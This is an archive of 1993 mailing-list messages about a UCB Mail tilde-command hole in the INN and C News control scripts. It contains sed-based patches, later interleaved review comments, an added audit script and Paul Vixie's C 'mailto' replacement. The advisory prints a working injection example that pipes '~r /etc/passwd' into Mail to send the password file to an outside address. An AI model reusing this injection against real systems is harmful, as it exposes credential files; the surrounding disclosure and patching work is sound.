From rsalz@uunet.uu.net Sun Dec 26 00:58:38 1993
Date: Mon, 20 Dec 93 15:28:37 -0500
From: rsalz@uunet.uu.net (Rich Salz)
To: inn-gurus@uunet.UU.NET
Subject: Forthcoming CERT notice

Casper Dik and Tom Limoncelli found this.  CERT will be posting something
based on what I wrote, that follows.  I will be sending out complete text
in a day or two.  Sigh.  Who do I blame for this Mail bug -- Robert Henry,
as I recall... :-)
	/r$

Message 69:
>From rsalz Thu Dec 16 12:00:39 1993
Received: by sulphur.osf.org (1.37.109.4/4.7) id AA04756; Thu, 16 Dec 93 12:00:26 -0500
Date: Thu, 16 Dec 93 12:00:26 -0500
From: rsalz
Message-Id: <9312161700.AA04756@sulphur.osf.org>
To: ecd@cert.org, rsalz@osf.org
Subject: Re:  vu#8654 - INN mail to program
Status: RO

{Ed, lemme also say that I will probably post this whole note to Usenet
at some point.}

The problem is as follows:
    Most (if not all) UCB Mail (a/k/a mailx) programs interpret
    ~-commands even when not interactive.  For example:
	    (
		    echo ~t rsalz@osf.org
		    echo ~r /etc/passwd
	    ) | Mail
    will send me your password file.

    As a result, any program that directly pipes into mail without
    being careful has a hole.  Both INN and C News have this capability.

Usenet-specific information.
    As distributed, INN will mail various control messages to the news
    admin.  This is done under the control of a program running as
    the news admin, with an admin-specified path.  If a bad guy puts
    tilde-commands like those above into the body of their control message
    then bad things can happen.

I believe that the following patch (to be applied in the samples directory
of the INN distribution) will provide a work-around for INN.  This is
not verified, nor guaranteed; system administrators should verify all
instances of MAILCMD in their INN source.  Apply the patch and re-install.
===================================================================
diff -c -r1.13 checkgroups
*** 1.13	1993/03/18 21:04:45
--- checkgroups	1993/12/16 16:44:20
***************
*** 21,27 ****
  	echo "${CONTROLPROGS}/docheckgroups <<-EOF-"
  	${SED} -e '1,/^$/d' <${ARTICLE}
  	echo '-EOF-'
!     ) | ${MAILCMD} -s "checkgroups by ${FROM}" ${NEWSMASTER}
      ;;
  doit)
      ${SED} -e '1,/^$/d' <${ARTICLE} \
--- 21,27 ----
  	echo "${CONTROLPROGS}/docheckgroups <<-EOF-"
  	${SED} -e '1,/^$/d' <${ARTICLE}
  	echo '-EOF-'
!     ) | sed -e 's/^~/~~/' | ${MAILCMD} -s "checkgroups by ${FROM}" ${NEWSMASTER}
      ;;
  doit)
      ${SED} -e '1,/^$/d' <${ARTICLE} \
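Review bot: The new "!" line calls a bare "sed", while the unchanged context lines in this same script call "${SED} -e '1,/^$/d'", so the security filter is the only sed here resolved through PATH rather than through the configured variable. Write it as ${SED} -e 's/^~/~~/' so the filter and the header-stripping step run the same binary.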
===================================================================
diff -c -r1.10 default
*** 1.10	1993/01/29 16:52:07
--- default	1993/12/16 16:45:50
***************
*** 10,17 ****
  
  case ${ACTION} in
  mail)
!     ${MAILCMD} -s "Unknown control message by ${FROM}" \
! 	    ${NEWSMASTER} <${ARTICLE}
      ;;
  doit|logit)
      ${WRITELOG} ${LOGFILE} "Unknown control message by ${FROM}" \
--- 10,17 ----
  
  case ${ACTION} in
  mail)
!     sed -e 's/^~/~~/' <${ARTICLE} \
!         | ${MAILCMD} -s "Unknown control message by ${FROM}" ${NEWSMASTER}
      ;;
  doit|logit)
      ${WRITELOG} ${LOGFILE} "Unknown control message by ${FROM}" \
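Review bot: Nothing on the two new "!" lines in the mail) branch says why the article now goes through sed instead of the old "<${ARTICLE}" redirection, so a later tidy-up could quietly revert it. Add a one-line comment above the sed stating that it escapes leading "~" so Mail does not treat body lines as tilde-commands.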
===================================================================
diff -c -r1.5 ihave
*** 1.5	1992/09/14 19:21:36
--- ihave	1993/12/16 16:46:20
***************
*** 9,15 ****
  
  case ${ACTION} in
  mail)
!     ${MAILCMD} -s "ihave by ${FROM}" ${NEWSMASTER} <${ARTICLE}
      ;;
  doit)
      ##  Scan the message body for articles we don't have.
--- 9,16 ----
  
  case ${ACTION} in
  mail)
!     sed -e 's/^~/~~/' <${ARTICLE} \
! 	| ${MAILCMD} -s "ihave by ${FROM}" ${NEWSMASTER}
      ;;
  doit)
      ##  Scan the message body for articles we don't have.
===================================================================
diff -c -r1.16 rmgroup
*** 1.16	1993/03/18 21:04:59
--- rmgroup	1993/12/16 16:46:42
***************
*** 21,27 ****
  	echo "	${NEWSBIN}/ctlinnd rmgroup ${P1}"
  	echo ''
  	echo 'The full article was:'
! 	cat ${ARTICLE}
      ) | ${MAILCMD} -s "rmgroup $1 by ${FROM}" ${NEWSMASTER}
      exit
      ;;
--- 21,27 ----
  	echo "	${NEWSBIN}/ctlinnd rmgroup ${P1}"
  	echo ''
  	echo 'The full article was:'
! 	sed -e 's/^~/~~/' ${ARTICLE}
      ) | ${MAILCMD} -s "rmgroup $1 by ${FROM}" ${NEWSMASTER}
      exit
      ;;
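Review bot: In this hunk the filter replaces only "cat ${ARTICLE}" inside the subshell, whereas the checkgroups, sendsys, senduuname and version hunks filter everything written to the pipe. The echo lines shown start with fixed text, but the lines above line 21 are not visible here; placing the sed after the closing ")" as in the other scripts would cover the whole body and keep the scripts uniform.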
===================================================================
diff -c -r1.4 sendme
*** 1.4	1992/09/14 19:21:48
--- sendme	1993/12/16 16:47:03
***************
*** 9,15 ****
  
  case ${ACTION} in
  mail)
!     ${MAILCMD} -s "sendme by ${FROM}" ${NEWSMASTER} <${ARTICLE}
      ;;
  doit)
      ##  Scan the message body.
--- 9,16 ----
  
  case ${ACTION} in
  mail)
!     sed -e 's/^~/~~/' <${ARTICLE} \
! 	| ${MAILCMD} -s "sendme by ${FROM}" ${NEWSMASTER}
      ;;
  doit)
      ##  Scan the message body.
===================================================================
diff -c -r1.12 sendsys
*** 1.12	1992/09/14 19:21:48
--- sendsys	1993/12/16 16:50:50
***************
*** 29,35 ****
  	echo ''
  	echo 'The full article was:'
  	cat ${ARTICLE}
!     ) | ${MAILCMD} -s "sendsys by ${FROM}" ${NEWSMASTER}
      ;;
  logit)
      ${WRITELOG} ${LOGFILE} "sendsys by ${FROM}; reply skipped" <${ARTICLE}
--- 29,35 ----
  	echo ''
  	echo 'The full article was:'
  	cat ${ARTICLE}
!     ) | sed -e 's/^~/~~/' | ${MAILCMD} -s "sendsys by ${FROM}" ${NEWSMASTER}
      ;;
  logit)
      ${WRITELOG} ${LOGFILE} "sendsys by ${FROM}; reply skipped" <${ARTICLE}
***************
*** 38,44 ****
      case "$1" in
      "")
  	${MAILCMD} -s "${SUBJECT}" ${REPLYTO} <${NEWSFEEDS}
! 	${MAILCMD} -s "sendsys by ${FROM}; reply sent" ${NEWSMASTER} <${ARTICLE}
  	;;
      *)
  	${AWK} "/^$1"'[/:\\]/,/[^\\]$/' ${NEWSFEEDS} >${TEMP}
--- 38,45 ----
      case "$1" in
      "")
  	${MAILCMD} -s "${SUBJECT}" ${REPLYTO} <${NEWSFEEDS}
! 	sed -e 's/^~/~~/' <${ARTICLE} \
! 	    | ${MAILCMD} -s "sendsys by ${FROM}; reply sent" ${NEWSMASTER}
  	;;
      *)
  	${AWK} "/^$1"'[/:\\]/,/[^\\]$/' ${NEWSFEEDS} >${TEMP}
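Review bot: The unchanged context line '${MAILCMD} -s "${SUBJECT}" ${REPLYTO} <${NEWSFEEDS}' still feeds a file straight into MAILCMD with no filter. The newsfeeds file is local, but nothing in the visible lines guarantees that none of its lines begins with "~", and the message is sent to ${REPLYTO}; running it through the same sed would leave no unfiltered MAILCMD in this branch.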
***************
*** 45,52 ****
  	trap 'rm -f ${TEMP} ; exit' 1 2 3 15
  	if [ -s ${TEMP} ] ;  then
  	    ${MAILCMD} -s "${SUBJECT} for $1" ${REPLYTO} <${TEMP}
! 	    ${MAILCMD} -s "sendsys $1 by ${FROM}; reply sent" \
! 		    ${NEWSMASTER} <${ARTICLE}
  	fi
  	rm -f ${TEMP}
  	;;
--- 46,54 ----
  	trap 'rm -f ${TEMP} ; exit' 1 2 3 15
  	if [ -s ${TEMP} ] ;  then
  	    ${MAILCMD} -s "${SUBJECT} for $1" ${REPLYTO} <${TEMP}
! 	    sed -e 's/^~/~~/' <${ARTICLE} \
! 		| ${MAILCMD} -s "sendsys $1 by ${FROM}; reply sent" \
! 		    ${NEWSMASTER}
  	fi
  	rm -f ${TEMP}
  	;;
===================================================================
diff -c -r1.4 senduuname
*** 1.4	1992/09/14 19:21:49
--- senduuname	1993/12/16 16:51:21
***************
*** 17,23 ****
  	echo "	uuname | ${MAILCMD} -s \"${SUBJECT}\" ${FROM}"
  	echo 'The full article was:'
  	cat ${ARTICLE}
!     ) | ${MAILCMD} -s "senduuname by ${FROM}" ${NEWSMASTER}
      ;;
  logit)
      ${WRITELOG} ${LOGFILE} "senduuname by ${FROM}; reply skipped" <${ARTICLE}
--- 17,23 ----
  	echo "	uuname | ${MAILCMD} -s \"${SUBJECT}\" ${FROM}"
  	echo 'The full article was:'
  	cat ${ARTICLE}
!     ) | sed -e 's/^~/~~/' | ${MAILCMD} -s "senduuname by ${FROM}" ${NEWSMASTER}
      ;;
  logit)
      ${WRITELOG} ${LOGFILE} "senduuname by ${FROM}; reply skipped" <${ARTICLE}
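Review bot: The context line that echoes 'uuname | ${MAILCMD} -s \"${SUBJECT}\" ${FROM}' puts ${FROM} into a ready-to-run command line unquoted, and the new sed on the pipe only escapes leading "~" in the mailed text; it does nothing for that echoed command if it is later pasted into a shell. Quote ${FROM} in the echoed text the same way ${SUBJECT} already is.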
===================================================================
diff -c -r1.23 version
*** 1.23	1993/03/18 21:05:06
--- version	1993/12/16 16:51:40
***************
*** 21,27 ****
  	echo "	echo InterNetNews ${VERSION} | ${MAILCMD} -s \"${SUBJECT}\" ${FROM}"
  	echo 'The full article was:'
  	cat ${ARTICLE}
!     ) | ${MAILCMD} -s "version by ${FROM}" ${NEWSMASTER}
      ;;
  logit)
      ${WRITELOG} ${LOGFILE} "version by ${FROM}; reply skipped" <${ARTICLE}
--- 21,27 ----
  	echo "	echo InterNetNews ${VERSION} | ${MAILCMD} -s \"${SUBJECT}\" ${FROM}"
  	echo 'The full article was:'
  	cat ${ARTICLE}
!     ) | sed -e 's/^~/~~/' | ${MAILCMD} -s "version by ${FROM}" ${NEWSMASTER}
      ;;
  logit)
      ${WRITELOG} ${LOGFILE} "version by ${FROM}; reply skipped" <${ARTICLE}
===================================================================
diff -c -r1.3 writelog
*** 1.3	1993/03/18 21:05:07
--- writelog	1993/12/16 16:51:59
***************
*** 26,32 ****
      exit 0
      ;;
  Xmail)
!     ${MAILCMD} -s "${MESSAGE}" ${NEWSMASTER}
      exit 0
      ;;
  esac
--- 26,32 ----
      exit 0
      ;;
  Xmail)
!     sed -e 's/^~/~~/' | ${MAILCMD} -s "${MESSAGE}" ${NEWSMASTER}
      exit 0
      ;;
  esac

C News has the same problem, although it is less likely to happen since
C News does not document how to mail control messages, and even then you
can only mail newgroup messages.  The fix is as follows, to be applied in
the relay/ctl directory.  Apply this patch then re-install.
*** newgroup.new	Thu Dec 16 11:56:54 1993
--- newgroup	Tue Sep  8 20:49:04 1992
***************
*** 119,125 ****
  				echo '==='
  				;;
  			esac
! 		) | sed -e 's/^~/~~/' | mail $NEWSMASTER
  		;;
  	esac
  	exit
--- 119,125 ----
  				echo '==='
  				;;
  			esac
! 		) | mail $NEWSMASTER
  		;;
  	esac
  	exit
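Review bot: This diff is reversed: the "***" (old) side is newgroup.new and carries the "sed -e 's/^~/~~/'" line, while the "---" (new) side is newgroup without it, so applied as written it removes the filter rather than adding it. Regenerate it with the original file first (diff -c newgroup newgroup.new), or tell readers to apply it with patch -R.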
----------- End Forwarded Message -----------
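
The note above asks administrators to "verify all instances of MAILCMD" in their scripts. The following is an added example, not part of the original messages and not INN code: a heuristic audit that flags each ${MAILCMD} invocation with no 's/^~/~~/' filter directly upstream on the same pipeline. The names audit_mailcmd and make_samples are hypothetical, and the sample scripts are constructed here, modelled on the hunks above.

```shell
#!/bin/sh
# Added example (not INN code): flag ${MAILCMD} invocations whose input is
# not passed through the tilde-escaping filter used in the patch above.

FILTER='s/^~/~~/'

# audit_mailcmd DIR -> prints "file:line:command" for each suspect line.
audit_mailcmd() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        awk -v file="${f##*/}" -v filt="$FILTER" '
            function check(s, n,    pos, before, q) {
                pos = index(s, "${MAILCMD}")
                if (pos == 0) return
                before = substr(s, 1, pos - 1)
                # Odd count of unescaped double quotes before the match:
                # MAILCMD sits inside a string (text echoed into the mail).
                q = before; gsub(/\\"/, "", q)
                if (gsub(/"/, "", q) % 2 == 1) return
                # Accept only "... FILTER ... | ${MAILCMD}" on one pipeline.
                if (index(before, filt) > 0 && before ~ /\|[ \t]*$/) return
                gsub(/[ \t]+/, " ", s)
                printf "%s:%d:%s\n", file, n, s
            }
            {
                # Join backslash-continued lines so a pipeline is seen whole.
                if (buf == "") start = NR
                line = $0
                if (line ~ /\\$/) { sub(/\\$/, "", line); buf = buf line; next }
                check(buf line, start)
                buf = ""
            }
            END { if (buf != "") check(buf, start) }
        ' "$f"
    done
}

# make_samples DIR -> writes constructed control-script fragments into DIR.
make_samples() {
    # Pre-patch form: article redirected straight into MAILCMD.
    cat >"$1/ihave.orig" <<'EOF'
mail)
    ${MAILCMD} -s "ihave by ${FROM}" ${NEWSMASTER} <${ARTICLE}
EOF
    # Patched form, pipeline continued over two lines.
    cat >"$1/ihave" <<'EOF'
mail)
    sed -e 's/^~/~~/' <${ARTICLE} \
        | ${MAILCMD} -s "ihave by ${FROM}" ${NEWSMASTER}
EOF
    # MAILCMD inside echoed text, then a filtered subshell.
    cat >"$1/senduuname" <<'EOF'
    (
        echo "  uuname | ${MAILCMD} -s \"${SUBJECT}\" ${FROM}"
        cat ${ARTICLE}
    ) | sed -e 's/^~/~~/' | ${MAILCMD} -s "senduuname by ${FROM}" ${NEWSMASTER}
EOF
    # Filter inside the subshell only: reported so a human checks the rest.
    cat >"$1/rmgroup" <<'EOF'
    (
        echo 'The full article was:'
        sed -e 's/^~/~~/' ${ARTICLE}
    ) | ${MAILCMD} -s "rmgroup $1 by ${FROM}" ${NEWSMASTER}
EOF
}

# Demo run over the constructed samples.
tmp=$(mktemp -d) && make_samples "$tmp" && audit_mailcmd "$tmp"
rm -rf "$tmp"
```

A reported line is a prompt for manual review, not proof of a hole: the rmgroup sample is listed because the filter covers only part of what reaches the pipe.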



From jis@MIT.EDU Sun Dec 26 01:02:08 1993
Date: Mon, 20 Dec 93 22:36:46 -0500
From: Jeffrey I. Schiller <jis@MIT.EDU>
Sender: jis@MIT.EDU
To: marthag@MIT.EDU, ghudson@MIT.EDU, mhpower@MIT.EDU, marc@MIT.EDU
Subject: [anselmo@nic.near.net: Security hole(s) in C news and INN]

To: nearnet-security@nic.near.net
Subject: Security hole(s) in C news and INN
Date: Mon, 20 Dec 1993 17:44:22 -0500
From: Ed Anselmo <anselmo@nic.near.net>

This came across on the INN developers list this afternoon.  I guess
we can all expect a CERT advisory on this (sometime).  For a
description of the problem, see "The problem is as follows:" section.

Tentative fixes for INN and C news sites are included.

	-- Ed

------- Forwarded Message

Date: Mon, 20 Dec 93 15:28:37 -0500
From: Rich Salz <rsalz@uunet.uu.net>
Message-Id: <9312202028.AA00979@rodan.UU.NET>
To: inn-gurus@uunet.uu.net
Subject: Forthcoming CERT notice

Casper Dik and Tom Limoncelli found this.  CERT will be posting something
based on what I wrote, that follows.  I will be sending out complete text
in a day or two.  Sigh.  Who do I blame for this Mail bug -- Robert Henry,
as I recall... :-)
	/r$

Message 69:
>From rsalz Thu Dec 16 12:00:39 1993
Received: by sulphur.osf.org (1.37.109.4/4.7) id AA04756; Thu, 16 Dec 93 12:00:26 -0500
Date: Thu, 16 Dec 93 12:00:26 -0500
From: rsalz
Message-Id: <9312161700.AA04756@sulphur.osf.org>
To: ecd@cert.org, rsalz@osf.org
Subject: Re:  vu#8654 - INN mail to program
Status: RO

{Ed, lemme also say that I will probably post this whole note to Usenet
at some point.}

The problem is as follows:
    Most (if not all) UCB Mail (a/k/a mailx) programs interpret
    ~-commands even when not interactive.  For example:
	    (
		    echo ~t rsalz@osf.org
		    echo ~r /etc/passwd
	    ) | Mail
    will send me your password file.

    As a result, any program that directly pipes into mail without
    being careful has a hole.  Both INN and C News have this capability.

Usenet-specific information.
    As distributed, INN will mail various control messages to the news
    admin.  This is done under the control of a program running as
    the news admin, with an admin-specified path.  If a bad guy puts
    tilde-commands like those above into the body of their control message
    then bad things can happen.

I believe that the following patch (to be applied in the samples directory
of the INN distribution) will provide a work-around for INN.  This is
not verified, nor guaranteed; system administrators should verify all
instances of MAILCMD in their INN source.  Apply the patch and re-install.
===================================================================
diff -c -r1.13 checkgroups
*** 1.13	1993/03/18 21:04:45
- --- checkgroups	1993/12/16 16:44:20
***************
*** 21,27 ****
  	echo "${CONTROLPROGS}/docheckgroups <<-EOF-"
  	${SED} -e '1,/^$/d' <${ARTICLE}
  	echo '-EOF-'
!     ) | ${MAILCMD} -s "checkgroups by ${FROM}" ${NEWSMASTER}
      ;;
  doit)
      ${SED} -e '1,/^$/d' <${ARTICLE} \
- --- 21,27 ----
  	echo "${CONTROLPROGS}/docheckgroups <<-EOF-"
  	${SED} -e '1,/^$/d' <${ARTICLE}
  	echo '-EOF-'
!     ) | sed -e 's/^~/~~/' | ${MAILCMD} -s "checkgroups by ${FROM}" ${NEWSMASTER}
      ;;
  doit)
      ${SED} -e '1,/^$/d' <${ARTICLE} \
===================================================================
diff -c -r1.10 default
*** 1.10	1993/01/29 16:52:07
- --- default	1993/12/16 16:45:50
***************
*** 10,17 ****
  
  case ${ACTION} in
  mail)
!     ${MAILCMD} -s "Unknown control message by ${FROM}" \
! 	    ${NEWSMASTER} <${ARTICLE}
      ;;
  doit|logit)
      ${WRITELOG} ${LOGFILE} "Unknown control message by ${FROM}" \
- --- 10,17 ----
  
  case ${ACTION} in
  mail)
!     sed -e 's/^~/~~/' <${ARTICLE} \
!         | ${MAILCMD} -s "Unknown control message by ${FROM}" ${NEWSMASTER}
      ;;
  doit|logit)
      ${WRITELOG} ${LOGFILE} "Unknown control message by ${FROM}" \
===================================================================
diff -c -r1.5 ihave
*** 1.5	1992/09/14 19:21:36
- --- ihave	1993/12/16 16:46:20
***************
*** 9,15 ****
  
  case ${ACTION} in
  mail)
!     ${MAILCMD} -s "ihave by ${FROM}" ${NEWSMASTER} <${ARTICLE}
      ;;
  doit)
      ##  Scan the message body for articles we don't have.
- --- 9,16 ----
  
  case ${ACTION} in
  mail)
!     sed -e 's/^~/~~/' <${ARTICLE} \
! 	| ${MAILCMD} -s "ihave by ${FROM}" ${NEWSMASTER}
      ;;
  doit)
      ##  Scan the message body for articles we don't have.
===================================================================
diff -c -r1.16 rmgroup
*** 1.16	1993/03/18 21:04:59
- --- rmgroup	1993/12/16 16:46:42
***************
*** 21,27 ****
  	echo "	${NEWSBIN}/ctlinnd rmgroup ${P1}"
  	echo ''
  	echo 'The full article was:'
! 	cat ${ARTICLE}
      ) | ${MAILCMD} -s "rmgroup $1 by ${FROM}" ${NEWSMASTER}
      exit
      ;;
- --- 21,27 ----
  	echo "	${NEWSBIN}/ctlinnd rmgroup ${P1}"
  	echo ''
  	echo 'The full article was:'
! 	sed -e 's/^~/~~/' ${ARTICLE}
      ) | ${MAILCMD} -s "rmgroup $1 by ${FROM}" ${NEWSMASTER}
      exit
      ;;
===================================================================
diff -c -r1.4 sendme
*** 1.4	1992/09/14 19:21:48
- --- sendme	1993/12/16 16:47:03
***************
*** 9,15 ****
  
  case ${ACTION} in
  mail)
!     ${MAILCMD} -s "sendme by ${FROM}" ${NEWSMASTER} <${ARTICLE}
      ;;
  doit)
      ##  Scan the message body.
- --- 9,16 ----
  
  case ${ACTION} in
  mail)
!     sed -e 's/^~/~~/' <${ARTICLE} \
! 	| ${MAILCMD} -s "sendme by ${FROM}" ${NEWSMASTER}
      ;;
  doit)
      ##  Scan the message body.
===================================================================
diff -c -r1.12 sendsys
*** 1.12	1992/09/14 19:21:48
- --- sendsys	1993/12/16 16:50:50
***************
*** 29,35 ****
  	echo ''
  	echo 'The full article was:'
  	cat ${ARTICLE}
!     ) | ${MAILCMD} -s "sendsys by ${FROM}" ${NEWSMASTER}
      ;;
  logit)
      ${WRITELOG} ${LOGFILE} "sendsys by ${FROM}; reply skipped" <${ARTICLE}
- --- 29,35 ----
  	echo ''
  	echo 'The full article was:'
  	cat ${ARTICLE}
!     ) | sed -e 's/^~/~~/' | ${MAILCMD} -s "sendsys by ${FROM}" ${NEWSMASTER}
      ;;
  logit)
      ${WRITELOG} ${LOGFILE} "sendsys by ${FROM}; reply skipped" <${ARTICLE}
***************
*** 38,44 ****
      case "$1" in
      "")
  	${MAILCMD} -s "${SUBJECT}" ${REPLYTO} <${NEWSFEEDS}
! 	${MAILCMD} -s "sendsys by ${FROM}; reply sent" ${NEWSMASTER} <${ARTICLE}
  	;;
      *)
  	${AWK} "/^$1"'[/:\\]/,/[^\\]$/' ${NEWSFEEDS} >${TEMP}
- --- 38,45 ----
      case "$1" in
      "")
  	${MAILCMD} -s "${SUBJECT}" ${REPLYTO} <${NEWSFEEDS}
! 	sed -e 's/^~/~~/' <${ARTICLE} \
! 	    | ${MAILCMD} -s "sendsys by ${FROM}; reply sent" ${NEWSMASTER}
  	;;
      *)
  	${AWK} "/^$1"'[/:\\]/,/[^\\]$/' ${NEWSFEEDS} >${TEMP}
***************
*** 45,52 ****
  	trap 'rm -f ${TEMP} ; exit' 1 2 3 15
  	if [ -s ${TEMP} ] ;  then
  	    ${MAILCMD} -s "${SUBJECT} for $1" ${REPLYTO} <${TEMP}
! 	    ${MAILCMD} -s "sendsys $1 by ${FROM}; reply sent" \
! 		    ${NEWSMASTER} <${ARTICLE}
  	fi
  	rm -f ${TEMP}
  	;;
- --- 46,54 ----
  	trap 'rm -f ${TEMP} ; exit' 1 2 3 15
  	if [ -s ${TEMP} ] ;  then
  	    ${MAILCMD} -s "${SUBJECT} for $1" ${REPLYTO} <${TEMP}
! 	    sed -e 's/^~/~~/' <${ARTICLE} \
! 		| ${MAILCMD} -s "sendsys $1 by ${FROM}; reply sent" \
! 		    ${NEWSMASTER}
  	fi
  	rm -f ${TEMP}
  	;;
===================================================================
diff -c -r1.4 senduuname
*** 1.4	1992/09/14 19:21:49
- --- senduuname	1993/12/16 16:51:21
***************
*** 17,23 ****
  	echo "	uuname | ${MAILCMD} -s \"${SUBJECT}\" ${FROM}"
  	echo 'The full article was:'
  	cat ${ARTICLE}
!     ) | ${MAILCMD} -s "senduuname by ${FROM}" ${NEWSMASTER}
      ;;
  logit)
      ${WRITELOG} ${LOGFILE} "senduuname by ${FROM}; reply skipped" <${ARTICLE}
- --- 17,23 ----
  	echo "	uuname | ${MAILCMD} -s \"${SUBJECT}\" ${FROM}"
  	echo 'The full article was:'
  	cat ${ARTICLE}
!     ) | sed -e 's/^~/~~/' | ${MAILCMD} -s "senduuname by ${FROM}" ${NEWSMASTER}
      ;;
  logit)
      ${WRITELOG} ${LOGFILE} "senduuname by ${FROM}; reply skipped" <${ARTICLE}
===================================================================
diff -c -r1.23 version
*** 1.23	1993/03/18 21:05:06
- --- version	1993/12/16 16:51:40
***************
*** 21,27 ****
  	echo "	echo InterNetNews ${VERSION} | ${MAILCMD} -s \"${SUBJECT}\" ${FROM}"
  	echo 'The full article was:'
  	cat ${ARTICLE}
!     ) | ${MAILCMD} -s "version by ${FROM}" ${NEWSMASTER}
      ;;
  logit)
      ${WRITELOG} ${LOGFILE} "version by ${FROM}; reply skipped" <${ARTICLE}
- --- 21,27 ----
  	echo "	echo InterNetNews ${VERSION} | ${MAILCMD} -s \"${SUBJECT}\" ${FROM}"
  	echo 'The full article was:'
  	cat ${ARTICLE}
!     ) | sed -e 's/^~/~~/' | ${MAILCMD} -s "version by ${FROM}" ${NEWSMASTER}
      ;;
  logit)
      ${WRITELOG} ${LOGFILE} "version by ${FROM}; reply skipped" <${ARTICLE}
===================================================================
diff -c -r1.3 writelog
*** 1.3	1993/03/18 21:05:07
- --- writelog	1993/12/16 16:51:59
***************
*** 26,32 ****
      exit 0
      ;;
  Xmail)
!     ${MAILCMD} -s "${MESSAGE}" ${NEWSMASTER}
      exit 0
      ;;
  esac
- --- 26,32 ----
      exit 0
      ;;
  Xmail)
!     sed -e 's/^~/~~/' | ${MAILCMD} -s "${MESSAGE}" ${NEWSMASTER}
      exit 0
      ;;
  esac

C News has the same problem, although it is less likely to happen since
C News does not document how to mail control messages, and even then you
can only mail newgroup messages.  The fix is as follows, to be applied in
the relay/ctl directory.  Apply this patch then re-install.
*** newgroup.new	Thu Dec 16 11:56:54 1993
- --- newgroup	Tue Sep  8 20:49:04 1992
***************
*** 119,125 ****
  				echo '==='
  				;;
  			esac
! 		) | sed -e 's/^~/~~/' | mail $NEWSMASTER
  		;;
  	esac
  	exit
- --- 119,125 ----
  				echo '==='
  				;;
  			esac
! 		) | mail $NEWSMASTER
  		;;
  	esac
  	exit
- ----------- End Forwarded Message -----------



------- End of Forwarded Message


From paul@vix.com Sun Dec 26 01:02:10 1993
Date: Mon, 20 Dec 93 21:55:00 -0800
X-Btw: vix.com is also gw.home.vix.com and vixie.sf.ca.us
To: inn-gurus@uunet.UU.NET
From: paul@vix.com (Paul A Vixie)
Subject: Re: Forthcoming CERT notice
Organization: Vixie Enterprises
References: <9312202047.AA02717@rodan.UU.NET>
Nntp-Posting-Host: office.home.vix.com
In-Reply-To: rsalz@uunet.uu.net's message of 20 Dec 1993 12:52:25 -0800

>> you can pipe to anything that knows the "-s" flag ...

for some reason i considered this a challenge.  it took about two hours,
mostly because my son is sick and i was on dinner duty.  all new code --
please include in INN if there's room and need.

/* mailto - trivial replacement for ucbmail/mailx for sending mail only
 * vixie 20dec93 [original]
 *
 * $Id:$
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#include <sys/param.h>
#if BSD >= 199103
# include <paths.h>
#else
# define _PATH_SENDMAIL "/usr/lib/sendmail"
#endif

extern char		*optarg;
extern int		optind, optopt, opterr;

struct list {
	struct list *next;
	char *data;
};

static char		*ProgName = "amnesia";
static struct list	*Cc = NULL, *Bcc = NULL, *To = NULL;
static char		*Subject = NULL;
static int		Verbose = 0;

static int
listLen(struct list *list) {
	int x = 0;

	while (list) {
		list = list->next;
		x++;
	}
	return (x);
}

static void
listHdr(FILE *file, char *hdr, struct list *list) {
	for (;  list;  list = list->next) {
		fprintf(file, "%s\t%s%s\n",
			hdr,
			list->data,
			list->next ?"," :"");
		hdr = "";
	}
}

static void
mailto() {
	int pid, p[2], len, maxlen;
	FILE *sendmail;
	char *buf, **argv, **argp;
	struct list *list;

#ifdef BSD
	maxlen = getpagesize();
#else
	maxlen = BUFSIZ;
#endif
	if (pipe(p) < 0) {
		perror("pipe");
		exit(2);
	}
	switch (pid = fork()) {
	case -1:
		perror("fork");
		exit(2);
		/*NOTREACHED*/
	case 0:
		/* child */
		if (dup2(p[0], STDIN_FILENO) < 0) {
			perror("dup2");
			exit(3);
		}
		close(p[0]);  close(p[1]);
		argv = calloc(1/*path*/ + Verbose +
			      listLen(To) + listLen(Cc) + listLen(Bcc) +
			      1/*NULL*/, sizeof(char *));
		if (!argv) {
			fprintf(stderr, "%s: calloc failed\n", ProgName);
			exit(3);
		}
		argp = argv;
		*argp++ = _PATH_SENDMAIL;
		if (Verbose) *argp++ = "-v";
		for (list = To;  list;  list = list->next)
			*argp++ = list->data;
		for (list = Cc;  list;  list = list->next)
			*argp++ = list->data;
		for (list = Bcc;  list;  list = list->next)
			*argp++ = list->data;
		*argp = NULL;
		execv(_PATH_SENDMAIL, argv);
		perror(_PATH_SENDMAIL);
		exit(3);
		/*NOTREACHED*/
	default:
		/* parent */
		close(p[0]);
		if (!(sendmail = fdopen(p[1], "w"))) {
			perror("fdopen");
			exit(3);
		}
		if (!(buf = (char *) malloc(maxlen))) {
			perror("malloc");
			exit(3);
		}
		listHdr(sendmail, "To:", To);
		listHdr(sendmail, "Cc:", Cc);
		if (Subject) fprintf(sendmail, "Subject: %s\n", Subject);
		fputc('\n', sendmail);
		fflush(sendmail);
		while (0 < (len = read(STDIN_FILENO, buf, maxlen))) {
			if (0 > write(p[1], buf, len)) {
				perror("write");
				exit(3);
			}
		}
		if (len < 0) {
			perror("read");
			exit(3);
		}
		if (0 > close(p[1])) {
			perror("close");
			exit(3);
		}
		break;
	}
}

static void
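listAdd(struct list **head, char *data) {
	struct list *new = (struct list *) malloc(sizeof(struct list));

	/* fail cleanly rather than dereference NULL when out of memory */
	if (!new || !(new->data = (char *) malloc(strlen(data)+1))) {
		fprintf(stderr, "%s: malloc failed\n", ProgName);
		exit(3);
	}
	new->next = *head;
	strcpy(new->data, data);
	*head = new;
}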

static void
usage(char *errormsg) {
	fprintf(stderr, "%s: command syntax error: %s\n", ProgName, errormsg);
	fprintf(stderr,
	"usage: %s [-v] [-s subject] {-c cc-addr} {-b bcc-addr} to-addr ...\n",
		ProgName);
	exit(1);
}

int
main(int argc, char *argv[]) {
	int optch;

	if (NULL != (ProgName = strrchr(argv[0], '/')))
		ProgName++;
	else
		ProgName = argv[0];

	while ((optch = getopt(argc, argv, "s:c:b:v")) != EOF) {
		switch (optch) {
		case 's':
			if (Subject) usage("-s can only be used once");
			Subject = optarg;
			break;
		case 'c':
			listAdd(&Cc, optarg);
			break;
		case 'b':
			listAdd(&Bcc, optarg);
			break;
		case 'v':
			if (Verbose) usage("-v can only be used once");
			Verbose++;
			break;
		default:
			usage("unrecognized option");
		}
	}
	for (argc -= optind, argv += optind;
	     argc;
	     argc--, argv++) {
		listAdd(&To, *argv);
	}
	if (!To) usage("at least one to-addr must be specified");

	mailto();
	exit(0);
}
--
Paul Vixie
Redwood City, CA
<paul@vix.com>
decwrl!vixie!paul

From barrett@daisy.ee.und.ac.za Sun Dec 26 01:02:12 1993
